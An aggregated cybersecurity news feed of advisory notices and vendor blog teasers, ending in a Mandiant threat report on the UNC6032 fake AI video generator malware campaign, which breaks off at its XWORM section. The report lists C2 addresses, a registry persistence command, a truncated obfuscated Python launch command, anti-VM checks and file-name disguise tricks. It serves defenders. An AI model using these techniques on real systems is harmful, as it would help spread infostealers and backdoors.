De multiples vulnérabilités ont été découvertes dans Google Chrome. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

De multiples vulnérabilités ont été découvertes dans Citrix et Xen. Elles permettent à un attaquant de provoquer une élévation de privilèges.

De multiples vulnérabilités ont été découvertes dans les produits Mozilla. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

De multiples vulnérabilités ont été découvertes dans Curl. Elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données et un contournement de la politique de sécurité.

Une vulnérabilité a été découverte dans Traefik. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

Modern networks are complex, dynamic, and under constant threat. Learn how NDR adds critical in-network protection to stop today’s cyberattacks.

GreyNoise uncovers a stealth campaign exploiting ASUS routers, enabling persistent backdoor access via CVE-2023-39780 and unpatched techniques. Learn how attackers evade detection, how GreyNoise discovered it with AI-powered tooling, and what defenders need to know.

The Cookie-Bite attack is an advanced evolution of Pass-the-Cookie exploits. This tactic bypasses Multi-Factor Authentication (MFA) by leveraging stolen authentication cookies—such as Azure Entra ID’s ESTSAUTH and ESTSAUTHPERSISTENT—to impersonate users.

Today we are announcing a major milestone in our journey – Zscaler has signed a definitive agreement to acquire Red Canary.

Imagine this scenario: You’re winding down for the evening, having checked the locks and closed the windows, feeling secure enough to turn in for the night. But you forget to lock your vehicle. Sitting in plain sight on the sun visor is your garage door opener, an otherwise trusted tool now turned into an entry […] The post RMM: Tool Convenience and Control Comes with a Cost  appeared first on Binary Defense.

Lovers of Adidas clothes would be wise to be on their guard against phishing attacks, after the German sportswear giant revealed that a cyber attack had exposed the personal information of customers. Read more in my article on the Hot for Security blog.

There are many ways for attackers to move quietly through the network, using stolen credentials and subtle behavioral shifts to slip past firewalls and signature-based detection. But by analyzing how users and systems behave under normal conditions, user behavior analytics (UBA) help identify deviations that could signal insider threats, account compromises, or stealthy attacks.  How User Behavior Analytics Detects Anomalies  At the core of UBA is... Read more » The post How User Behavior Analytics (UBA) Fits Into the Security Stack appeared first on Plixer.

In today’s rapidly evolving digital world, where threats are constantly emerging and user expectations are higher than ever, maintaining a secure, reliable, and high-performing online presence is critical. Google Cloud Application Load Balancers have long been a cornerstone of this effort, expertly managing traffic and ensuring seamless user experiences. Now, Google Cloud takes application security […] The post Level Up Your Security: Google Cloud Enhances Load Balancers with HUMAN Security’s Anti-Fraud Expertise appeared first on HUMAN Security.

During the 9th Global ICT Energy Efficiency Summit in Dubai, Huawei showcased its next-generation digital and intelligent site power facility solution Single SitePower

Misconfigured Docker API instances have become the target of a new malware campaign that transforms them into a cryptocurrency mining botnet. The attacks, designed to mine for Dero currency, is notable for its worm-like capabilities to propagate the malware to other exposed Docker instances and rope them into an ever-growing horde of mining bots. Kaspersky said it observed an unidentified threat...

Maintaining and developing complex and risky code is never easy. See how we addressed the challenges of securing our SAML implementation with this behind-the-scenes look at building trust in our systems. The post Inside GitHub: How we hardened our SAML implementation appeared first on The GitHub Blog.

Maintaining and developing complex and risky code is never easy. See how we addressed the challenges of securing our SAML implementation with this behind-the-scenes look at building trust in our systems. The post Inside GitHub: How we hardened our SAML implementation appeared first on The GitHub Blog.

Our industry needs to continue working together on identity standards for agent access across systems. Read about how Microsoft is building a robust and sophisticated set of agents. The post The future of AI agents—and why OAuth must evolve appeared first on Microsoft Security Blog.

In the race against cyber threats, finding vulnerabilities is no longer enough. True security comes from understanding them—where they exist, how they were discovered, and what risks they pose. One of the most overlooked aspects in vulnerability management is knowing the source of detection. Without it, organizations may waste valuable time chasing the wrong threats […]

In today’s digital world, cybersecurity is foundational to providing adequate patient care — whether critical, preventative, or otherwise.

Cybersecurity researchers have disclosed a new malicious campaign that uses a fake website advertising antivirus software from Bitdefender to dupe victims into downloading a remote access trojan called Venom RAT. The campaign indicates a "clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems," the...

In episode 52 of The AI Fix, our hosts watch a non-existent musical about garlic bread, Graham shares a summer reading list of books that don't exist, Mark feels nauseous after watching a video of Sam Altman and Jony Ive waffling about products that don't exist, some non-existent robots stack empty crates in a factory that doesn't exist, and OpenAI releases Codex, an AI agent destined to make your software engineering job not exist. Graham reveals how an AI called "Thy" has ruined his childhood dream of becoming a late night radio DJ, and Mark looks at an experiment that showed groups of AI agents spontaneously create social norms—the building blocks of a society. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

Finland and Ukraine are strengthening their cooperation in promoting cyber security and cyber protection. The countries signed a Memorandum of Understanding (MoU) agreement, which aims to reinforce collaboration, facilitate sharing of best practices and technical information between countries cyber security authorities.

Finland and Ukraine are strengthening their cooperation in promoting cyber security and cyber protection. The countries signed a Memorandum of Understanding (MoU) agreement, which aims to reinforce collaboration, facilitate sharing of best practices and technical information between countries cyber security authorities.

They don’t wear capes, but they’re safeguarding your data, your networks and your future

Blogs Blog 16 Defendants Federally Charged in Connection with DanaBot Malware Scheme That Infected Computers Worldwide “LOS ANGELES – A federal grand jury indictment and criminal complaint unsealed today charge 16 defendants who allegedly developed and deployed the DanaBot malware which a Russia-based cybercrime organization controlled and deployed, infecting more than 300,000 victim computers around the world, facilitated fraud and […] The post 16 Defendants Federally Charged in Connection with DanaBot Malware Scheme That Infected Computers Worldwide appeared first on Flashpoint.

When we look at evolving customer communications, we often focus on improving the experience by adding new delivery channels, improving content by adding color and variable images based on the audience or improving self-service. Some organizations focus on making the communications interactive in digital channels, adding video or improving self-serve preference management to encourage digital adoption and reduce print costs.  Despite efforts over the years to merge transactional and promotional (marketing) communications, it’s still more common than not that these communications continue to be managed and generated in siloed systems, separating their stakeholders in name of privacy and security of the data. Marketing needs to have the freedom to explore any and all options when it comes to lead generation and customer nurturing while transactional communications need to maintain guardrails to retain trust with existing customers by protecting their sensitive data.  Unfortunately, this approach often impacts the customer experience. Inconsistencies in communication look and feel, silos by line of business, disconnected or limited integration between systems ultimately leaves gaps in the customer’s ability to navigate the vast web pages and content available through self-serve. This causes them to turn to support channels such as the contact center, customer service, agents, chats, etc. More often than not, these employees in the front lines of customer support often request patience from the customer as they need to navigate several internal systems in an effort to find the desired information or answers.  While many strategies look to new software, business process automation or to redesign communications as a way to improve the overall experience, the goldmine at the root of every experience is the customer data.  Customer data management is done in a variety of ways within an organization, even within individual lines of business. CRMs are often used to capture information for preference management, CDPs (customer data platforms) are used for website tracking and personalization, often missing the full omnichannel experience tracking. Marketing automation has included lightweight CRMs which are evolving to CDPs but are sometimes just their own database specific to their content-focused used cases. Campaign management is often separate as well, holding its own set of data used for personalizing campaigns and understanding customer behavior within them. Journey management solutions also have a unique set of data not stored elsewhere around the events, actions and behaviors, both planned and reality, that reflect customer interactions. Segmentation is another function that is often solved through custom scripting or home-grown systems or is embedded within other marketing systems but holds valuable insights.  The result is a vast system of siloed data sources that customer experience executives and communication centers of excellence (COE) see a need to address, but it requires a level of attention and effort to sort through. At best, go forward efforts such as zero copy policies helps reduce complexity, but can slow down adoption of new technologies.  Adding more complexity are AI and LLMs. Generative or Content AI is really where many communications and data tools have focused to generate or tweak content. However, concerns around intellectual property can limit how organizations want to use these tools. In communications management, assisting content creators to craft messages has shown some value, but is only the tip of the iceberg of the potential value AI can provide to communications experiences. The more data available to be fed into an LLM, the more we can leverage other AI variations such as Insights AI and Responsive AI, which have the potential to analyze the vast amount of data available in these siloed systems and make recommendations for improving customer experiences from individual touch points to the overall sentiment of the business relationship.  Knowing that this data exists today within organizations but in disparate systems is a good problem to start with. Many have attempted to solve this through business process management/automation and integration, but that approach can create complexities of its own. Aggregating all of this data to persist in a single, centralized database is an unrealistic effort that will get shut down by every CIO and IT department. So, how can we address this?  The first step is understanding where this data exists today. A few questions to ask… What systems exist and where? What type of data is stored in these systems? Is it usable? Is it actionable? Where and when is it used and to what extent? For example, can it be used for personalization of content within a communication, personalization of an experience touchpoint or automating orchestration follow ups?  Once you begin to understand the complexity of your organization’s data infrastructure and the valuable data it holds, you open the door to the opportunity to connect these systems with a customer data solution that can provide a powerful, complete view of the customer that is both actionable and insightful.  The work is not done yet. Understanding the personas who need to use this data, creating a data governance strategy and aligning key stakeholders are also critical steps to success. What are the desired outcomes and their respective priorities of this data once it’s aggregated, normalized, analyzed and able to provide a more complete view of your customers and their behaviors? This goldmine of data is powerful and desirable, so having clear priorities is key.  As we know in customer communications, data is sensitive and must be protected but can provide powerful insights that can improve business outcomes and enhance personalized experiences when used correctly. New solutions are becoming readily available that are approaching disparate enterprise data systems with a different approach that does not require ripping out the existing infrastructure. It is important to remember that the software and solutions are only as good as the strategy that is driving the ROI and outcomes of centralizing customer data.  The post Is your customer data ready for CX transformation? appeared first on OpenText Blogs.

Topic Ideas We welcome proposals from Graylog Security and Enterprise customers and Graylog open source users. You don’t need to be a professional speaker—just someone with a story worth telling. Example topics include: Customer success stories Traditional or unique use cases Upgrading from open source to Graylog Enterprise or Graylog Security Migration to Graylog 6.1 […] The post Get To Know Graylog GO appeared first on Graylog.

Commvault’s AI-powered assistant is scalable, secure, accurate, and adaptive. The post Arlie: What AI in IT Was Meant to Be appeared first on Commvault - English - United States.

Firewalls are important network devices for security and other applications. They help filter traffic based on specific criteria to prevent illegitimate users from accessing the network. They are not, however, designed specifically for distributed denial-of-service (DDoS) protection. Many networks suffer from...

Pročitajte novi broj Newslettera Nacionalnog CERT-a. Tema mjeseca: Zaštita korisničkog računa U svibanjskom izdanju newslettera donosimo vam pregled materijala koje smo izradili samostalno, a obuhvaćaju sve – od zaštite korisničkih računa do kibernetičke higijene u radu kod kuće. Hvala što ste dio naše zajednice. Radujemo se što ćemo s vama dijeliti zanimljive priče i korisne... The post Newsletter Nacionalnog CERT-a CERT-info #5 first appeared on CERT.hr.

At OpenText, we believe in taking steps to support a more sustainable and fair future. Our employees are at the heart of this effort, dedicating their time and energy to making a lasting impact in their communities. Whether volunteering their time with the help of three paid volunteer days each year or fundraising for global causes, OpenTexters across the globe are committed to creating positive change. At OpenText we call this: #OT4Good.   In this blog post, we shine a spotlight on the employee-led initiatives in Bengaluru, India, that are helping to drive progress in education and climate action.   Spreading Joy with Every Kit  In July 2024, the OpenText Bengaluru office partnered with Youth for Seva, a nation-wide movement that inspires youth to volunteer and drive positive change. OpenText sponsored approximately 950 school kits, each containing essentials like backpacks, books, and stationary products. High school kits also included a geometry box, while nursery kits featured colored pencils in addition to their books.  Our employee volunteers helped assemble and distribute the kits across four schools in Bengaluru city.   “It was an incredible opportunity to volunteer with Youth for Seva. Our team felt a great sense of fulfillment and joy knowing that we could make a difference in the lives of so many youth and children that will hopefully have a lasting impact and inspire them to give back to society as they grow up and accomplish great things.” – Moby Stationery Drive with Samarthanam Trust for the Disabled  As the school year began in Bengaluru, our volunteers organized a drive to collect unused stationery materials, gently used clothing and toys for families in need. They then visited Samarthanam Trust for the Disabled to distribute the donations and spend time with the children.  “Our collective efforts have reached the hearts of 350 children at Samarthanam Trust. The entire OpenText Bengaluru family united to contribute and deliver over 23 cartons filled with stationery, toys, and clothes. The meaningful impact we've made fills us with immense pride and gratitude. This experience reminds us of the transformative power of kindness and teamwork.” - Amudha  Tree Planting Drive  In October, OpenText India partnered with United Way of Bengaluru for a tree planting drive as part of the Sidlaghatta Social Forestry project, located in the outskirts of the city.  Sixty passionate OpenText volunteers gathered to dig the pits, add manure, and carefully plant and water each sapling, resulting in 200 saplings successfully planted that day!  This project was chosen by our team to fulfill a long-term vision: reforesting 100 acres of land while supporting local families through future fruit sales. This initiative will help restore green cover and strengthen the livelihoods of nearby villages.  “Sustainability reflects the core values of responsibility and innovation that we embrace at OpenText. It’s fulfilling to be part of an organization that prioritizes creating a positive environmental impact.” - Gaurav  “I chose to participate in the event because I deeply believe that each of us has a role to play in protecting and preserving the environment. Taking small, proactive steps today can lead to a more sustainable future. Beyond the cause itself, the event also offered a unique chance to interact with my colleagues in a more relaxed and meaningful setting, strengthening our sense of community and shared purpose.” - Pushpanjali At OpenText, our employees recognize the importance of giving back to the communities where they live and work. Over the past months, the OpenText team in Bengaluru focused their impact on quality education, aiding the well-being of underprivileged students, and supporting the environment around us. If you want to learn more about life at OpenText, visit our careers page at careers.opentext.com.   The post Spotlight On: #OT4Good in Bengaluru  appeared first on OpenText Blogs.

Most breaches are caused by everyday human mistakes. The 90-5-5 Concept is a framework that addresses this by shifting the conversation to proactive design.

Microsoft has shed light on a previously undocumented cluster of malicious activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to "worldwide cloud abuse." Active since at least April 2024, the hacking group is linked to espionage operations mainly targeting organizations that are important to Russian government objectives,...

Artificial intelligence is driving a massive shift in enterprise productivity, from GitHub Copilot’s code completions to chatbots that mine internal knowledge bases for instant answers. Each new agent must authenticate to other services, quietly swelling the population of non‑human identities (NHIs) across corporate clouds. That population is already overwhelming the enterprise: many companies...

Researchers have uncovered a hybrid email-and-phone scam based on fake Microsoft billing emails

Thanks to drastic policy changes in the US and Big Tech’s embrace of the second Trump administration, many people are moving their digital lives abroad. Here are a few options to get you started.

Ransomware actor exploited RMM to access multiple organizations; Sophos EDR blocked encryption on customer’s network

Ransomware actor exploited RMM to access multiple organizations; Sophos EDR blocked encryption on customer’s network

Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024. Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to Russia, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America. The post New Russia-affiliated actor Void Blizzard targets critical sectors for espionage appeared first on Microsoft Security Blog.

The mysterious database contains highly sensitive data that appears to have been harvested by infostealer malware

Cybercriminals impersonate the trusted e-signature brand and send fake Docusign notifications to trick people into giving away their personal or corporate data

MADRID — Together, the companies will help joint customers drive innovation, improve operational performance and create new competitive advantages.

Executive Summary  As previously noted, we achieved PCI DSS v4.0.1 compliance certification, becoming the first SASE platform provider to do so. This milestone reflects our commitment to the highest security standards, ensuring enhanced protection for sensitive data. Throughout the assessment, we collaborated with an external Qualified Security Assessor (QSA) from USD AG to ensure all... The post Achieving PCI DSS v4.0.1 Certification: A Comprehensive Overview of Cato Networks’ PCI Journey  appeared first on Cato Networks.

Compromised network edge devices are one of the biggest attack points for small and medium businesses

Finding the balance between transparency and personal data protection has been a constant challenge for governments and regulators across Europe. This has been starkly highlighted over the last three years by legal challenges regarding beneficial ownership registers and debates over press freedom. Having a deep understanding of the extent, quality and availability of information in European jurisdictions is an important element of S-RM’s work. There are two key areas in which S-RM has witnessed shifts in attitude and approach from greater transparency towards the prioritisation of privacy. In this article, Alice Norman examines recent developments in public access to beneficial ownership registers and the ongoing debate across Europe over restrictions on journalistic investigations and the right to information.

New Cisco research reveals overwhelming demand for Agentic AI to transform the way technology vendors deliver Customer ExperienceMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco research reveals accelerated demand for agentic-AI led customer experience, with 68% of interactions expected to be handled by agentic AI by 2028.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco research reveals accelerated demand for agentic-AI led customer experience, with 68% of interactions expected to be handled by agentic AI by 2028.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

The program provides customers with a smooth path to next-generation SAP Cloud ERP solutions delivered through our global partner ecosystem.

MADRID — Joule Agents offer instant access to game statistics, player performance trends and strategic comparisons using natural language.

MADRID — The global group of iconic sports and outdoor brands has embarked on a journey to accelerate digital transformation.

MADRID — CAF is on a digital transformation journey to a sustainable and efficient manufacturing process.

MADRID — The longtime SAP customer has adopted a hybrid system landscape to reduce the complexity of on-premises management.

This article on was originally distributed as a private report to our customers. Introduction Once upon a time, in the land of the CMS honeypot, a curious threat named Mimo crept silently through the digital woods. Unlike your typical fairytale villain, Mimo didn’t leave glass slippers—just suspicious payloads. Between February 28 and May 2, multiple […] La publication suivante The Sharp Taste of Mimo’lette: Analyzing Mimo’s Latest Campaign targeting Craft CMS est un article de Sekoia.io Blog.

The post Cato IoT/OT Security appeared first on Cato Networks.

SAP Integration Suite is a trusted solution for organizations seeking to standardize on a single integration technology.

Written by: Diana Ion, Rommel Joven, Yash Gupta Since November 2024, Mandiant Threat Defense has been investigating an UNC6032 campaign that weaponizes the interest around AI tools, in particular those tools which can be used to generate videos based on user prompts. UNC6032 utilizes fake “AI video generator” websites to distribute malware leading to the deployment of payloads such as Python-based infostealers and several backdoors. Victims are typically directed to these fake websites via malicious social media ads that masquerade as legitimate AI video generator tools like Luma AI, Canva Dream Lab, and Kling AI, among others. Mandiant Threat Defense has identified thousands of UNC6032-linked ads that have collectively reached millions of users across various social media platforms like Facebook and LinkedIn. We suspect similar campaigns are active on other platforms as well, as cybercriminals consistently evolve tactics to evade detection and target multiple platforms to increase their chances of success.  Mandiant Threat Defense has observed UNC6032 compromises culminating in the exfiltration of login credentials, cookies, credit card data, and Facebook information through the Telegram API. This campaign has been active since at least mid-2024 and has impacted victims across different geographies and industries. Google Threat Intelligence Group (GTIG) assesses UNC6032 to have a Vietnam nexus.  Mandiant Threat Defense acknowledges Meta's collaborative and proactive threat hunting efforts in removing the identified malicious ads, domains, and accounts. Notably, a significant portion of Meta’s detection and removal began in 2024, prior to Mandiant alerting them of additional malicious activity we identified. A similar investigation was recently published by Morphisec. Campaign Overview Threat actors haven't wasted a moment capitalizing on the global fascination with Artificial Intelligence. As AI's popularity surged over the past couple of years, cybercriminals quickly moved to exploit the widespread excitement. Their actions have fueled a massive and rapidly expanding campaign centered on fraudulent websites masquerading as cutting-edge AI tools. These websites have been promoted by a large network of misleading social media ads, similar to the ones shown in Figure 1 and Figure 2. Figure 1: Malicious Facebook ads Figure 2: Malicious LinkedIn ads As part of Meta’s implementation of the Digital Services Act, the Ad Library displays additional information (ad campaign dates, targeting parameters and ad reach) on all ads that target people from the European Union. LinkedIn has also implemented a similar transparency tool. Our research through both Ad Library tools identified over 30 different websites, mentioned across thousands of ads, active since mid 2024, all displaying similar ad content. The majority of ads which we found ran on Facebook, with only a handful also advertised on LinkedIn. The ads were published using both attacker-created Facebook pages, as well as by compromised Facebook accounts. Mandiant Threat Defense performed further analysis of a sample of over 120 malicious ads and, from the EU transparency section of the ads, their total reach for EU countries was over 2.3 million users. Table 1 displays the top 5 Facebook ads by reach. It should be noted that reach does not equate to the number of victims. According to Meta, the reach of an ad is an estimated number of how many Account Center accounts saw the ad at least once. Ad Library ID Ad Start Date Ad End Date EU Reach 1589369811674269 14.12.2024 18.12.2024 300,943 559230916910380 04.12.2024 09.12.2024 298,323 926639029419602 07.12.2024 09.12.2024 270,669 1097376935221216 11.12.2024 12.12.2024 124,103 578238414853201 07.12.2024 10.12.2024 111,416 Table 1: Top 5 Facebook ads by reach The threat actor constantly rotates the domains mentioned in the Facebook ads, likely to avoid detection and account bans. We noted that once a domain is registered, it will be referenced in ads within a few days if not the same day. Moreover, most of the ads are short lived, with new ones being created on a daily basis.  On LinkedIn, we identified roughly 10 malicious ads, each directing users to hxxps://klingxai[.]com. This domain was registered on September 19, 2024, and the first ad appeared just a day later. These ads have a total impression estimate of 50k-250k. For each ad, the United States was the region with the highest percentage of impressions, although the targeting included other regions such as Europe and Australia. Ad Library ID Ad Start Date Ad End Date Total Impressions % Impressions in the US 490401954 20.09.2024 20.09.2024 <1k 22 508076723 27.09.2024 28.09.2024 10k-50k 68 511603353 30.09.2024 01.10.2024 10k-50k 61 511613043 30.09.2024 01.10.2024 10k-50k 40 511613633 30.09.2024 01.10.2024 10k-50k 54 511622353 30.09.2024 01.10.2024 10k-50k 36 Table 2: LinkedIn ads From the websites investigated, Mandiant Threat Defense observed that they have similar interfaces and offer purported functionalities such as text-to-video or image-to-video generation. Once the user provides a prompt to generate a video, regardless of the input, the website will serve one of the static payloads hosted on the same (or related) infrastructure.  The payload downloaded is the STARKVEIL malware. It drops three different modular malware families, primarily designed for information theft and capable of downloading plugins to extend their functionality. The presence of multiple, similar payloads suggests a fail-safe mechanism, allowing the attack to persist even if some payloads are detected or blocked by security defences. In the next section, we will delve deeper into one particular compromise Mandiant Threat Defense responded to. Luma AI Investigation Infection Chain Figure 3: Infection chain lifecycle This blog post provides a detailed analysis of our findings on the key components of this campaign: Lure: The threat actors leverage social networks to push AI-themed ads that direct users to fake AI websites, resulting in malware downloads. Malware: It contains several malware components, including the STARKVEIL dropper, which deploys the XWORM and FROSTRIFT backdoors and the GRIMPULL downloader. Execution: The malware makes extensive use of DLL side-loading, in-memory droppers, and process injection to execute its payloads. Persistence: It uses AutoRun registry key for its two Backdoors (XWORM and FROSTRIFT). Anti-VM and Anti-analysis: GRIMPULL checks for commonly used artifacts\features from known Sandbox and analysis tools. Reconnaissance  Host reconnaissance: XWORM and FROSTRIFT survey the host by collecting information, including OS, username, role, hardware identifiers, and installed AV. Software reconnaissance: FROSTRIFT checks the existence of certain messaging applications and browsers. Command-and-control (C2) Tor: GRIMPULL utilizes a Tor Tunnel to fetch additional .NET payloads. Telegram: XWORM sends victim notification via telegram including information gathered during host reconnaissance. TCP: The malware connects to its C2 using ports 7789, 25699, 56001. Information stealer  Keylogger: XWORM log keystrokes from the host. Browser extensions: FROSTRIFT scans for 48 browser extensions related to Password managers, Authenticators, and Digital wallets potentially for data theft. Backdoor Commands: XWORM supports multiple commands for further compromise. The Lure This particular case began from a Facebook Ad for “Luma Dream AI Machine”, masquerading as a well-known text-to-video AI tool - Luma AI. The ad, as seen in Figure 4, redirected the user to an attacker-created website hosted at hxxps://lumalabsai[.]in/. Figure 4: The ad the victim clicked on Once on the fake Luma AI website, the user can click the “Start Free Now” button and choose from various video generation functionalities. Regardless of the selected option, the same prompt is displayed, as shown in the GIF in Figure 5.  This multi-step process, made to resemble any other legitimate text-to-video or image-to-video generation tool website, creates a sense of familiarity to the user and does not give any immediate indication of malicious intent. Once the user hits the generate button, a loading bar appears, mimicking an AI model hard at work. After a few seconds, when the new video is supposedly ready, a Download button is displayed. This leads to the download of a ZIP archive file on the victim host. Figure 5: Fake AI video generation website Unsurprisingly, the ready-to-download archive is one of many payloads already hosted on the same server, with no connection to the user input. In this case, several archives were hosted at the path hxxps://lumalabsai[.]in/complete/. Mandiant determined that the website will serve the archive file with the most recent “Last Modified” value, indicating continuous updates by the threat actor. Mandiant compared some of these payloads and found them to be functionally similar, with different obfuscation techniques applied, thus resulting in different sizes. Figure 6: Payloads hosted at hxxps://lumalabsai[.]in/complete Execution The previously downloaded ZIP archive contains an executable with a double extension (.mp4 and .exe) in its name, separated by thirteen Braille Pattern Blank (Unicode: U+2800, UTF-8: E2 A0 80) characters. This is a special whitespace character from the Braille Pattern Block in Unicode. Figure 7: Braille Pattern Blank characters in the file name The resulting file name, Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe, aims to make the binary less suspicious by pushing the .exe extension out of the user view. The number of Braille Pattern Blank characters used varies across different samples served, ranging from 13 to more than 30. To further hide the true purpose of this binary, the default .mp4 Windows icon is used on the malicious file. Figure 8 shows how the file looks on Windows 11, compared to a legitimate .mp4 file. Figure 8: Malicious binary vs legitimate .mp4 file STARKVEIL The binary Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe, tracked by Mandiant as STARKVEIL, is a dropper written in Rust. Once executed, it extracts an embedded archive containing benign executables and its malware components. These are later utilized to inject malicious code into several legitimate processes.  Executing the malware displays an error window, as seen in Figure 9, to trick the user into trying to execute it again and into believing that the file is corrupted. Figure 9: Error window displayed when executing STARKVEIL For a successful compromise, the executable needs to run twice; the initial execution results in the extraction of all the embedded files under the C:\winsystem\ directory. Figure 10: Files in the winsystem directory During the second execution, the main executable spawns the Python Launcher, py.exe, with an obfuscated Python command as an argument. The Python command decodes an embedded Python code, which Mandiant tracks as COILHATCH dropper. COILHATCH performs the following actions (note that the script has been deobfuscated and renamed for improved readability): The command takes a Base85-encoded string, decodes it, decompresses the result using zlib, deserializes the resulting data using the marshal module, and then executes the final deserialized data as Python code. Figure 11: Python command The decompiled first-stage Python code combines RSA, AES, RC4, and XOR techniques to decrypt the second stage Python bytecode. Figure 12: First-stage Python The decrypted second-stage Python script executes C:\winsystem\heif\heif.exe, which is a legitimate, digitally signed executable, used to side-load a malicious DLL. This serves as the launcher to execute the other malware components. Figure 13: Second-stage Python The following is the resulting process tree: explorer.exe ↳ 7zfm.exe "\Lumalabs_1926326251082123689-626.zip" ↳ "\lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe" ↳ "C:\winsystem\py\py.exe" -c exec(__import__ ....) ↳ "C:\WINDOWS\system32\cmd.exe" /c "C:\winsystem\heif\heif.exe" ↳ "C:\winsystem\heif\heif.exe" Malware Analysis As mentioned, the STARKVEIL malware drops its components during its first execution and executes a launcher on its second execution. The complete analysis of all the malware components and their roles is provided in the next sections. Directory Benign File Side-Loaded DLL Role (Malware) C:\winsystem\heif heif.exe heif.dll (SHA256: 839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b) Launcher %APPDATA%\Launcher Launcher.exe libde265.dll (SHA256: 4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959) Persistence %APPDATA%\python python.exe avcodec-61.dll (SHA256: 8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc) Downloader (GRIMPULL) %APPDATA%\pythonw pythonw.exe heif.dll (SHA256: a0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3) Backdoor executed at runtime (XWORM) C:\winsystem\heif-info heif-info.exe heif.dll (SHA256: 1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb) Backdoor for persistence (XWORM) %APPDATA%\ffplay ffplay.exe libde265.dll (SHA256: dcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3) Backdoor executed at runtime (FROSTRIFT) C:\winsystem\heif2rgb heif2rgb.exe heif.dll (SHA256: e663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822) Backdoor for persistence (FROSTRIFT) Table 3: Malware components Each of these DLLs operates as an in-memory dropper and spawns a new victim process to perform code injection through process replacement. Launcher The execution of C:\winsystem\heif\heif.exe results in the side-loading of the malicious heif.dll, located in the same directory. This DLL is an in-memory dropper that spawns a legitimate Windows process (which may vary) and performs code injection through process replacement. The injected code is a .NET executable that acts as a launcher and performs the following: Moves multiple folders from C:\winsystem to %APPDATA%. The destination folders are: %APPDATA%\python %APPDATA%\pythonw %APPDATA%\ffplay %APPDATA%\Launcher Launches three legitimate processes to side-load associated malicious DLLs. The malicious DLLs for each process are: python.exe: %APPDATA%\python\avcodec-61.dll pythonw.exe: %APPDATA%\pythonw\heif.dll ffplay.exe: %APPDATA%\ffplay\libde265.dll Establishes persistence via AutoRun registry key. value: Dropbox key: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ root: HKCU\ value data: "cmd.exe /c \"cd /d "" && "Launcher.exe"" Figure 14: Main function of launcher The AutoRun Key executes %APPDATA%\Launcher\Launcher.exe that sideloads the DLL file libde265.dll. This DLL spawns and injects its payload into AddInProcess32.exe via PE hollowing. The injected code’s main purpose is to execute the legitimate binaries C:\winsystem\heif2rgb\heif2rgb.exe and C:\winsystem\heif-info\heif-info.exe, which, in turn, sideload the backdoors XWORM and FROSTRIFT, respectively. GRIMPULL Of the three executables, the launcher first executes %APPDATA%\python\python.exe, which side-loads the DLL avcodec-61.dll and injects the malware GRIMPULL into a legitimate Windows process.  GRIMPULL is a .NET-based downloader that incorporates anti-VM capabilities and utilizes Tor for C2 server connections. Anti-VM and Anti-Analysis  GRIMPULL begins by checking for the presence of the mutex value aff391c406ebc4c3, and terminates itself if this is found. Otherwise, the malware proceeds to perform further anti-VM checks, exiting in case any of the mentioned checks succeeds. Anti-VM and Anti-Analysis Checks Module Detection Checks for sandbox/analysis tool DLLs: SbieDll.dll (Sandboxie) cuckoomon.dll (Cuckoo Sandbox) BIOS Information Checks Queries Win32_BIOS via WMI and checks version and serial number for: VMware VIRTUAL A M I (AMI BIOS) Xen Parent Process Check Checks if parent process is cmd (command line) VM File Detection Checks for existence of vmGuestLib.dll in the System folder System Manufacturer Checks Queries Win32_ComputerSystem via WMI and checks manufacturer and model for: Microsoft (Hyper-V) VMWare Virtual Display and System Configuration Checks Checks for specific screen resolutions: 1440x900 1024x768 1280x1024 Checks if the OS is 32-bit Username Checks Checks for common analysis environment usernames: john anna Any username containing xxxxxxxx Table 4: Anti-VM and Anti-analysis checks Download Function GRIMPULL verifies the presence of a Tor process. If a Tor process is not detected, it proceeds to download, decompress, and execute Tor from the following URL: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/ tor-expert-bundle-windows-i686-13.0.9.tar.gz Figure 15: Download function Afterwards, Tor will run locally on port 9050. C2 Communication GRIMPULL then attempts to connect to the following C2 server via the Tor tunnel over TCP. strokes[.]zapto[.]org:7789 The malware maintains this connection and periodically checks for .NET payloads. Fetched payloads are decrypted using TripleDES in ECB mode with the MD5 hash of the campaign ID aff391c406ebc4c3 as the decryption key, decompressed with GZip (using a 4-byte length prefix), reversed, and then loaded into memory as .NET assemblies. Malware Configuration The configuration elements are encoded as base64 strings, as shown in Figure 16. Figure 16: Encoded malware configuration Table 5 shows the extracted malware configuration. GRIMPULL Malware Configuration C2 domain/server strokes[.]zapto[.]org Port number 7789 Unique identifier/campaign ID  aff391c406ebc4c3 Configuration profile name Default Table 5: GRIMPULL configuration XWORM 